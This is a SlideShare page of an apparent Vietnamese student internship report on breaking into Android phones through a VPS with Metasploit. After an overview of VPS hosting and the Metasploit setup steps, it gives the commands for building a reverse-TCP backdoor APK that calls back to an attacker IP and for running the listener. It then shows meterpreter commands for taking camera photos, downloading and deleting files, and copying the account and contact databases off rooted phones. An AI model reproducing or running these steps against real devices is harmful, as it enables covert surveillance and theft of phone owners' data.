SlideShare a Scribd company logo
1 of 18
BÁO CÁO TUẦN 4
GVHD: Võ Đỗ Thắng
SVTT: Lê Phan Hữu Mỹ - 51102110
Thực hiện xâm nhập android thông qua mạng Internet
1. Giới thiệu về VPS
1.1.VPS là gì?
Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành
nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài
khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS
có hiệu năng cao hơn Share Host rất nhiều.
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản
lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị
hack local.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server,
nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác
cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản khác trên
VPS đều hoạt động bình thường.
VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy
trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có
thêm một số kiến thức về bảo mật, cấu hình server,….
1.2.Đặc điểm về thông số VPS
Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM
riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng.
Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có
thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS,
dowload/upload bittorrent với tốc độ cao…
Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không
cần phải khởi động lại hệ thống.
Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.
1.3.Giá trị khi sử dụng VPS
Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp.
Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.
Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.
Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection.
Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
2. Cài đặt metasploit
Để cài đặt metasploit trước tiên ta phải vào trang http://metasploit.com để tải bộ cài đặt metasploit
về máy của mình. Ta nhấp vào phần Free Metasploit Download và nó sẽ hiện ra trang bên dưới
Ở đây mình sẽ down bản METASPLOIT COMMUNITY.
Sau khi nhấp vào link, nó sẽ xuất hiện một trang đăng kí. Mình nhập thông tin đầy đủ và nhấp vào
SUBMIT & DOWNLOAD để nhận một license
Tiếp theo nó sẽ xuất hiện trang download, ta sẽ chọn bản phù hợp.
Sau khi tải xong, ta bắt đầu tiến trình cài đặt. Trước tiên ta nhấp vào bản cài đặt và nhấn Next
Bên dưới ta chọn thư mục để cài đặt và nhấn Next
Ta phải đảm bảo rằng các phần mềm diệt virut đều được đóng, nếu không nó sẽ ngăn cản việc cài
đặt
SLL Port, Server Name và Days of validity ta để mặc định
Ta tiếp tục nhấn Next để bắt đầu cài đặt
Cài đặt xong ta nhấp Finish để kết thúc việc cài đặt
Sau khi kết thúc việc cài đặt, ta sẽ vào link http://localhost:3790/ để đăng kí tài khoản. Ta nhấp
đầy đủ theo những yêu cầu bên dưới và nhấn Create Account
Sau đó trình duyệt sẽ chuyển đến trang nhập key để active chương trình
Ta vào địa chỉ mail mà ta đã sử dụng khi download bộ cài đăt metasploit, điền key vào và nhấn
ACTIVE LICENSE
Như vậy là ta đã có một tài khoản metasploit
3. Xâm nhập vào thiết bị android
Trước tiên ta mở Terminal trong Kali Linux lên và gõ lệnh để tạo một backdoor:
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R>
/root/Desktop/app.apk
Trong đó 14.0.21.184 là địa chỉ máy VPS của ta.
/root/Desktop/app.apk là đường dẫn chứa file vừa tạo.
Sau khi tạo một backdoor được tạo, ta tải nó lên mạng.
Khi máy android down về cài đặt và truy cập vào thì sẽ hiện lên như bên dưới:
Ta vào máy VPS và mở Metasploit Console lên
Sau đó ta sẽ đánh các lệnh như bên dưới để tạo một môi trường và liên kết với máy android mà ta
sẽ tấn công:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 14.0.21.184
set lport 4444
run
Ở đây lhost và lport phải giống với lhost và lport khi tạo backdoor
Khi máy android nhấp vào biểu tượng có chữ ReverseTCP thì sẽ có thông báo là đã kết nối
Ta gõ lệnh help để hiện lên các lệnh mà ta có thể sử dụng để hack android
- Xem thông tin
Ta dùng lệnh sysinfo để xem thông tin máy android
- Xem camera
Ta dùng lênh webcam_list để xem danh sách các camera
Ta dùng lệnh webcam_snap x để chụp một bức ảnh từ camera của máy android.
Trong đó: x là 1: Back Camera
2: Front Camera
Để di chuyển đến thư mục nào ta dùng lệnh
cd <đường dẫn đến thư mục>
Lệnh ls để xem trong thư mục có những gì
Ta vào thư mục /sdcard/Download để down file về
- Download file
Ta dùng lệnh download <tên file> để down file đó về máy VPS của ta
Muốn xóa một file ta dùng lệnh rm <tên file>
- Đánh cắp tài khoản, danh bạ
Để đánh cắp tài khoản trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này
phải được root trước đó.
Ta dùng lệnh shell để vào hệ thống
Dùng lệnh su để toàn quyền truy cập
Dùng lệnh whoami để biết máy android đã được root chưa. Nếu rồi thì nó sẽ hiện thông báo là
unknown uid 0
Ta gõ cd /data/system để vào thư mục system
Tiếp theo gõ ls –l để xem trong thư mục có gì
Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard
Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh
download file accounts.db về máy VPS của chúng ta
Tiếp tục ta vào địa chỉ
cd /data/data/com.android.providers.contacts/databases
Để copy file contacts2.db về Sdcard bằng lệnh
cp contacts2.db /sdcard
Sau đó ta download file contacts2.db về máy VPS
Ta mở file *.db bằng phần mềm SQLite. Ta có thể down phần mềm đó về vài cài vào VPS của
chúng ta

More Related Content

What's hot

Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareNguyen Stone
 
Part 37 exchange server - smtp -www.key4_vip.info
Part 37   exchange server - smtp -www.key4_vip.infoPart 37   exchange server - smtp -www.key4_vip.info
Part 37 exchange server - smtp -www.key4_vip.infolaonap166
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5Chuc Thanh
 
Part 37 exchange server - internet protocol -www.key4_vip.info
Part 37   exchange server - internet protocol -www.key4_vip.infoPart 37   exchange server - internet protocol -www.key4_vip.info
Part 37 exchange server - internet protocol -www.key4_vip.infolaonap166
 
Cách sử dụng tên miền thật khi chạy website ở localhost
Cách sử dụng tên miền thật khi chạy website ở localhostCách sử dụng tên miền thật khi chạy website ở localhost
Cách sử dụng tên miền thật khi chạy website ở localhostLel Đặng Văn
 
Part 33 hacking - windows server update service - wsus -www.key4_vip.info
Part 33   hacking - windows server update service - wsus -www.key4_vip.infoPart 33   hacking - windows server update service - wsus -www.key4_vip.info
Part 33 hacking - windows server update service - wsus -www.key4_vip.infolaonap166
 
Báo cáo thực tập doanh nghiệp-Athena
Báo cáo thực tập doanh nghiệp-AthenaBáo cáo thực tập doanh nghiệp-Athena
Báo cáo thực tập doanh nghiệp-Athenaquocluong
 
Lab 1 xay dung ftp server
Lab 1 xay dung ftp serverLab 1 xay dung ftp server
Lab 1 xay dung ftp serverhoangpuon
 
Vũ thanh hiếu cài đặt kali trên vmware
Vũ thanh hiếu   cài đặt kali trên vmwareVũ thanh hiếu   cài đặt kali trên vmware
Vũ thanh hiếu cài đặt kali trên vmwareAnh Hiếu
 
Microsoft forefront tmg part 3 - access rule -www.key4_vip.info
Microsoft forefront tmg   part 3 - access rule -www.key4_vip.infoMicrosoft forefront tmg   part 3 - access rule -www.key4_vip.info
Microsoft forefront tmg part 3 - access rule -www.key4_vip.infolaonap166
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxLê Lãnh
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6kakawpah0911
 
Hướng dẫn cài đặt cent os 6.5
Hướng dẫn cài đặt cent os 6.5Hướng dẫn cài đặt cent os 6.5
Hướng dẫn cài đặt cent os 6.5thienma217
 
Hướng Dẫn Cài Đặt Apache và php trên local
Hướng Dẫn Cài Đặt Apache và php trên localHướng Dẫn Cài Đặt Apache và php trên local
Hướng Dẫn Cài Đặt Apache và php trên localquocluong
 

What's hot (20)

Wordress dung
Wordress dungWordress dung
Wordress dung
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMware
 
Cai dat kali tren vmware
Cai dat kali tren vmwareCai dat kali tren vmware
Cai dat kali tren vmware
 
Part 37 exchange server - smtp -www.key4_vip.info
Part 37   exchange server - smtp -www.key4_vip.infoPart 37   exchange server - smtp -www.key4_vip.info
Part 37 exchange server - smtp -www.key4_vip.info
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5
 
Part 37 exchange server - internet protocol -www.key4_vip.info
Part 37   exchange server - internet protocol -www.key4_vip.infoPart 37   exchange server - internet protocol -www.key4_vip.info
Part 37 exchange server - internet protocol -www.key4_vip.info
 
Cách sử dụng tên miền thật khi chạy website ở localhost
Cách sử dụng tên miền thật khi chạy website ở localhostCách sử dụng tên miền thật khi chạy website ở localhost
Cách sử dụng tên miền thật khi chạy website ở localhost
 
Part 33 hacking - windows server update service - wsus -www.key4_vip.info
Part 33   hacking - windows server update service - wsus -www.key4_vip.infoPart 33   hacking - windows server update service - wsus -www.key4_vip.info
Part 33 hacking - windows server update service - wsus -www.key4_vip.info
 
Báo cáo thực tập doanh nghiệp-Athena
Báo cáo thực tập doanh nghiệp-AthenaBáo cáo thực tập doanh nghiệp-Athena
Báo cáo thực tập doanh nghiệp-Athena
 
Lab 1 xay dung ftp server
Lab 1 xay dung ftp serverLab 1 xay dung ftp server
Lab 1 xay dung ftp server
 
Vũ thanh hiếu cài đặt kali trên vmware
Vũ thanh hiếu   cài đặt kali trên vmwareVũ thanh hiếu   cài đặt kali trên vmware
Vũ thanh hiếu cài đặt kali trên vmware
 
Microsoft forefront tmg part 3 - access rule -www.key4_vip.info
Microsoft forefront tmg   part 3 - access rule -www.key4_vip.infoMicrosoft forefront tmg   part 3 - access rule -www.key4_vip.info
Microsoft forefront tmg part 3 - access rule -www.key4_vip.info
 
Trantrongan
TrantronganTrantrongan
Trantrongan
 
Lab 11 ftp server
Lab 11 ftp server  Lab 11 ftp server
Lab 11 ftp server
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
 
New (1)
New (1)New (1)
New (1)
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6
 
Hướng dẫn cài đặt cent os 6.5
Hướng dẫn cài đặt cent os 6.5Hướng dẫn cài đặt cent os 6.5
Hướng dẫn cài đặt cent os 6.5
 
Hướng Dẫn Cài Đặt Apache và php trên local
Hướng Dẫn Cài Đặt Apache và php trên localHướng Dẫn Cài Đặt Apache và php trên local
Hướng Dẫn Cài Đặt Apache và php trên local
 
Tạo web jommla
Tạo web jommlaTạo web jommla
Tạo web jommla
 

Viewers also liked

Parents night presentation
Parents night presentationParents night presentation
Parents night presentationLisa Clarke
 
Forex Chart
Forex ChartForex Chart
Forex Chartorsivzds
 
Giving Tuesday - Trend on the Horizon
Giving Tuesday - Trend on the HorizonGiving Tuesday - Trend on the Horizon
Giving Tuesday - Trend on the HorizonLisa Clarke
 
Forex Charts
Forex ChartsForex Charts
Forex Chartsorsivzds
 
อัลบั้มรูป
อัลบั้มรูปอัลบั้มรูป
อัลบั้มรูปkwan2255
 
Coming home sponsorship 24jan14 v9
Coming home sponsorship 24jan14 v9Coming home sponsorship 24jan14 v9
Coming home sponsorship 24jan14 v9Mitchell Coffin
 
2016학년도 1학기 대학원 신입생 오리엔테이션 문헌검색 20160224_김경아
2016학년도 1학기 대학원 신입생 오리엔테이션 문헌검색 20160224_김경아2016학년도 1학기 대학원 신입생 오리엔테이션 문헌검색 20160224_김경아
2016학년도 1학기 대학원 신입생 오리엔테이션 문헌검색 20160224_김경아Kay Kim
 
5 s house keeping
5 s   house keeping5 s   house keeping
5 s house keepingernzsun
 
Leadership Gaps in the Nonprofit Sector
Leadership Gaps in the Nonprofit SectorLeadership Gaps in the Nonprofit Sector
Leadership Gaps in the Nonprofit SectorLisa Clarke
 

Viewers also liked (15)

Parents night presentation
Parents night presentationParents night presentation
Parents night presentation
 
Forex Chart
Forex ChartForex Chart
Forex Chart
 
Giving Tuesday - Trend on the Horizon
Giving Tuesday - Trend on the HorizonGiving Tuesday - Trend on the Horizon
Giving Tuesday - Trend on the Horizon
 
Tuan 2
Tuan 2Tuan 2
Tuan 2
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
 
Tuan 3
Tuan 3Tuan 3
Tuan 3
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
 
Tuan 1
Tuan 1Tuan 1
Tuan 1
 
Forex Charts
Forex ChartsForex Charts
Forex Charts
 
อัลบั้มรูป
อัลบั้มรูปอัลบั้มรูป
อัลบั้มรูป
 
Coming home sponsorship 24jan14 v9
Coming home sponsorship 24jan14 v9Coming home sponsorship 24jan14 v9
Coming home sponsorship 24jan14 v9
 
2016학년도 1학기 대학원 신입생 오리엔테이션 문헌검색 20160224_김경아
2016학년도 1학기 대학원 신입생 오리엔테이션 문헌검색 20160224_김경아2016학년도 1학기 대학원 신입생 오리엔테이션 문헌검색 20160224_김경아
2016학년도 1학기 대학원 신입생 오리엔테이션 문헌검색 20160224_김경아
 
5 s house keeping
5 s   house keeping5 s   house keeping
5 s house keeping
 
Slide bao cao thuc tap
Slide bao cao thuc tapSlide bao cao thuc tap
Slide bao cao thuc tap
 
Leadership Gaps in the Nonprofit Sector
Leadership Gaps in the Nonprofit SectorLeadership Gaps in the Nonprofit Sector
Leadership Gaps in the Nonprofit Sector
 

Similar to Tuan 4

Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu   tạo mã độc trên vps tấn công androidVũ thanh hiếu   tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công androidAnh Hiếu
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )Trọng An
 
Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSLê Lãnh
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6phanconghien
 
Wordress_copyright Võ Tâm Long
Wordress_copyright Võ Tâm LongWordress_copyright Võ Tâm Long
Wordress_copyright Võ Tâm LongVõ Tâm Long
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocXuân Ngọc Nguyễn
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảothach28
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linuxHường Tô
 
các bước hack server
các bước hack servercác bước hack server
các bước hack servertruong le hung
 
Bao cao thuc tap tuan 5
Bao cao thuc tap tuan 5Bao cao thuc tap tuan 5
Bao cao thuc tap tuan 5Thanh Tuan Ngo
 
Cac buochackserver tech24_vn
Cac buochackserver tech24_vnCac buochackserver tech24_vn
Cac buochackserver tech24_vnhantinh169
 
Cai dat metasploit community tren windows và ubuntu
Cai dat metasploit community tren windows và ubuntuCai dat metasploit community tren windows và ubuntu
Cai dat metasploit community tren windows và ubuntuthach28
 
Part 11 domain controller - join domain -www.key4_vip.info
Part 11   domain controller - join domain -www.key4_vip.infoPart 11   domain controller - join domain -www.key4_vip.info
Part 11 domain controller - join domain -www.key4_vip.infolaonap166
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5Nguyen Anh
 

Similar to Tuan 4 (20)

Tuan5
Tuan5Tuan5
Tuan5
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu   tạo mã độc trên vps tấn công androidVũ thanh hiếu   tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công android
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
 
Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPS
 
Bao cao vps
Bao cao vpsBao cao vps
Bao cao vps
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
 
Wordpress
WordpressWordpress
Wordpress
 
Vps
VpsVps
Vps
 
Wordress_copyright Võ Tâm Long
Wordress_copyright Võ Tâm LongWordress_copyright Võ Tâm Long
Wordress_copyright Võ Tâm Long
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảo
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linux
 
các bước hack server
các bước hack servercác bước hack server
các bước hack server
 
Cac buochackserver
Cac buochackserverCac buochackserver
Cac buochackserver
 
Cpanel user
Cpanel userCpanel user
Cpanel user
 
Bao cao thuc tap tuan 5
Bao cao thuc tap tuan 5Bao cao thuc tap tuan 5
Bao cao thuc tap tuan 5
 
Cac buochackserver tech24_vn
Cac buochackserver tech24_vnCac buochackserver tech24_vn
Cac buochackserver tech24_vn
 
Cai dat metasploit community tren windows và ubuntu
Cai dat metasploit community tren windows và ubuntuCai dat metasploit community tren windows và ubuntu
Cai dat metasploit community tren windows và ubuntu
 
Part 11 domain controller - join domain -www.key4_vip.info
Part 11   domain controller - join domain -www.key4_vip.infoPart 11   domain controller - join domain -www.key4_vip.info
Part 11 domain controller - join domain -www.key4_vip.info
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5
 

Tuan 4

  • 1. BÁO CÁO TUẦN 4 GVHD: Võ Đỗ Thắng SVTT: Lê Phan Hữu Mỹ - 51102110 Thực hiện xâm nhập android thông qua mạng Internet 1. Giới thiệu về VPS 1.1.VPS là gì? Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều. Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị hack local. Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình thường. VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,…. 1.2.Đặc điểm về thông số VPS Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng. Tiết kiệm được nhiều chi phí so với việc thuê một server riêng. Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao… Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không cần phải khởi động lại hệ thống. Có thể cài lại hệ điều hành với thời gian từ 5-10 phút. 1.3.Giá trị khi sử dụng VPS Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp.
  • 2. Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng. Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng. Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection. Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
  • 3. 2. Cài đặt metasploit Để cài đặt metasploit trước tiên ta phải vào trang http://metasploit.com để tải bộ cài đặt metasploit về máy của mình. Ta nhấp vào phần Free Metasploit Download và nó sẽ hiện ra trang bên dưới Ở đây mình sẽ down bản METASPLOIT COMMUNITY. Sau khi nhấp vào link, nó sẽ xuất hiện một trang đăng kí. Mình nhập thông tin đầy đủ và nhấp vào SUBMIT & DOWNLOAD để nhận một license
  • 4. Tiếp theo nó sẽ xuất hiện trang download, ta sẽ chọn bản phù hợp. Sau khi tải xong, ta bắt đầu tiến trình cài đặt. Trước tiên ta nhấp vào bản cài đặt và nhấn Next
  • 5. Bên dưới ta chọn thư mục để cài đặt và nhấn Next Ta phải đảm bảo rằng các phần mềm diệt virut đều được đóng, nếu không nó sẽ ngăn cản việc cài đặt
  • 6. SLL Port, Server Name và Days of validity ta để mặc định Ta tiếp tục nhấn Next để bắt đầu cài đặt
  • 7. Cài đặt xong ta nhấp Finish để kết thúc việc cài đặt Sau khi kết thúc việc cài đặt, ta sẽ vào link http://localhost:3790/ để đăng kí tài khoản. Ta nhấp đầy đủ theo những yêu cầu bên dưới và nhấn Create Account
  • 8. Sau đó trình duyệt sẽ chuyển đến trang nhập key để active chương trình Ta vào địa chỉ mail mà ta đã sử dụng khi download bộ cài đăt metasploit, điền key vào và nhấn ACTIVE LICENSE
  • 9. Như vậy là ta đã có một tài khoản metasploit 3. Xâm nhập vào thiết bị android Trước tiên ta mở Terminal trong Kali Linux lên và gõ lệnh để tạo một backdoor: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R> /root/Desktop/app.apk Trong đó 14.0.21.184 là địa chỉ máy VPS của ta. /root/Desktop/app.apk là đường dẫn chứa file vừa tạo.
  • 10. Sau khi tạo một backdoor được tạo, ta tải nó lên mạng. Khi máy android down về cài đặt và truy cập vào thì sẽ hiện lên như bên dưới: Ta vào máy VPS và mở Metasploit Console lên
  • 11. Sau đó ta sẽ đánh các lệnh như bên dưới để tạo một môi trường và liên kết với máy android mà ta sẽ tấn công: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 14.0.21.184 set lport 4444 run Ở đây lhost và lport phải giống với lhost và lport khi tạo backdoor Khi máy android nhấp vào biểu tượng có chữ ReverseTCP thì sẽ có thông báo là đã kết nối
  • 12. Ta gõ lệnh help để hiện lên các lệnh mà ta có thể sử dụng để hack android - Xem thông tin Ta dùng lệnh sysinfo để xem thông tin máy android
  • 13. - Xem camera Ta dùng lênh webcam_list để xem danh sách các camera Ta dùng lệnh webcam_snap x để chụp một bức ảnh từ camera của máy android. Trong đó: x là 1: Back Camera 2: Front Camera Để di chuyển đến thư mục nào ta dùng lệnh cd <đường dẫn đến thư mục> Lệnh ls để xem trong thư mục có những gì Ta vào thư mục /sdcard/Download để down file về
  • 14. - Download file Ta dùng lệnh download <tên file> để down file đó về máy VPS của ta Muốn xóa một file ta dùng lệnh rm <tên file>
  • 15. - Đánh cắp tài khoản, danh bạ Để đánh cắp tài khoản trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này phải được root trước đó. Ta dùng lệnh shell để vào hệ thống Dùng lệnh su để toàn quyền truy cập Dùng lệnh whoami để biết máy android đã được root chưa. Nếu rồi thì nó sẽ hiện thông báo là unknown uid 0 Ta gõ cd /data/system để vào thư mục system Tiếp theo gõ ls –l để xem trong thư mục có gì
  • 16. Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh download file accounts.db về máy VPS của chúng ta
  • 17. Tiếp tục ta vào địa chỉ cd /data/data/com.android.providers.contacts/databases Để copy file contacts2.db về Sdcard bằng lệnh cp contacts2.db /sdcard Sau đó ta download file contacts2.db về máy VPS
  • 18. Ta mở file *.db bằng phần mềm SQLite. Ta có thể down phần mềm đó về vài cài vào VPS của chúng ta